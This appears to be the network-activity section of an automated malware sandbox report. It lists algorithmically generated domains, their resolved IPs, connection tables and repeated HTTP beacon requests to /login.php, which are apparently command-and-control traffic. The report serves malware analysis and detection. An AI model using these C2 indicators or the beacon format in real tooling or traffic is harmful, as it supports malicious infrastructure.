purydyv.com
qetyvep.com
vojyqem.com
galykes.com
lygymoj.com
vocyzit.com
lymysan.com
vowycac.com
puzywel.com	A 54.227.98.220
volykyc.com	A 35.225.160.245
pufygug.com	A 54.227.98.220	54.227.98.220
lymyxid.com
gaqycos.com
puzylyp.com	A 54.227.98.220
dns.msftncsi.com	AAAA fd3e:4f5a:5b81::1	131.107.255.255
volyqat.com
pumyxiv.com	A 54.227.98.220	54.227.98.220
gatyfus.com

TCP

Source	Source Port	Destination	Destination Port
192.168.56.101	49180	162.255.119.102	80
192.168.56.101	49200	198.54.117.217	80
192.168.56.101	49202	198.54.117.217	80
192.168.56.101	49189	208.100.26.245 lyvyxor.com	80
192.168.56.101	49186	23.80.253.233	80
192.168.56.101	49196	23.80.253.233	80
192.168.56.101	49184	35.225.160.245 volykyc.com	80
192.168.56.101	49188	35.225.160.245 volykyc.com	80
192.168.56.101	49199	52.72.29.7	80
192.168.56.101	49181	54.227.98.220 pumyxiv.com	80
192.168.56.101	49182	54.227.98.220 pumyxiv.com	80
192.168.56.101	49183	54.227.98.220 pumyxiv.com	80
192.168.56.101	49187	54.227.98.220 pumyxiv.com	80
192.168.56.101	49190	54.227.98.220 pumyxiv.com	80
192.168.56.101	49192	54.227.98.220 pumyxiv.com	80
192.168.56.101	49193	54.227.98.220 pumyxiv.com	80
192.168.56.101	49194	54.227.98.220 pumyxiv.com	80
192.168.56.101	49195	54.227.98.220 pumyxiv.com	80
192.168.56.101	49209	54.227.98.220 pumyxiv.com	80
192.168.56.101	49210	54.227.98.220 pumyxiv.com	80

UDP

Source	Source Port	Destination	Destination Port
192.168.56.101	49235	114.114.114.114	53
192.168.56.101	49710	114.114.114.114	53
192.168.56.101	49713	114.114.114.114	53
192.168.56.101	50002	114.114.114.114	53
192.168.56.101	50047	114.114.114.114	53
192.168.56.101	50320	114.114.114.114	53
192.168.56.101	50433	114.114.114.114	53
192.168.56.101	50534	114.114.114.114	53
192.168.56.101	50568	114.114.114.114	53
192.168.56.101	50849	114.114.114.114	53
192.168.56.101	50921	114.114.114.114	53
192.168.56.101	51137	114.114.114.114	53
192.168.56.101	51162	114.114.114.114	53
192.168.56.101	51326	114.114.114.114	53
192.168.56.101	51378	114.114.114.114	53
192.168.56.101	51660	114.114.114.114	53
192.168.56.101	51808	114.114.114.114	53
192.168.56.101	52124	114.114.114.114	53
192.168.56.101	52126	114.114.114.114	53
192.168.56.101	52345	114.114.114.114	53

HTTP & HTTPS Requests

URI	Data
http://lyvyxor.com/login.php	GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: lyvyxor.com Content-Length: 6 \x9e\x84\xb5\xe8q(
http://pupybul.com/login.php	GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: pupybul.com Content-Length: 6 \x9e\x84\xb5\xe8q(
http://volykyc.com/login.php	GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: volykyc.com Content-Length: 6 \x9e\x84\xb5\xe8q(
http://lysyfyj.com/login.php	GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: lysyfyj.com Content-Length: 6 \x9e\x84\xb5\xe8q(
http://qegyhig.com/login.php	GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: qegyhig.com Content-Length: 6 \x9e\x84\xb5\xe8q(
http://pumypog.com/login.php	GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: pumypog.com Content-Length: 6 \x9e\x84\xb5\xe8q(
http://www.pupybul.com/login.php	GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: www.pupybul.com Connection: Keep-Alive \x9e\x84\xb5\xe8q(
http://puzylyp.com/login.php	GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: puzylyp.com Content-Length: 6 \x9e\x84\xb5\xe8q(
http://ganypih.com/login.php	GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: ganypih.com Content-Length: 6 \x9e\x84\xb5\xe8q(
http://puvytuq.com/login.php	GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: puvytuq.com Content-Length: 6 \x9e\x84\xb5\xe8q(

ICMP traffic

No ICMP traffic performed.

IRC traffic

No IRC requests performed.

Suricata Alerts

No Suricata Alerts

Suricata TLS

No Suricata TLS

Snort Alerts

No Snort Alerts

Sorry! No dropped files.

Sorry! No dropped buffers.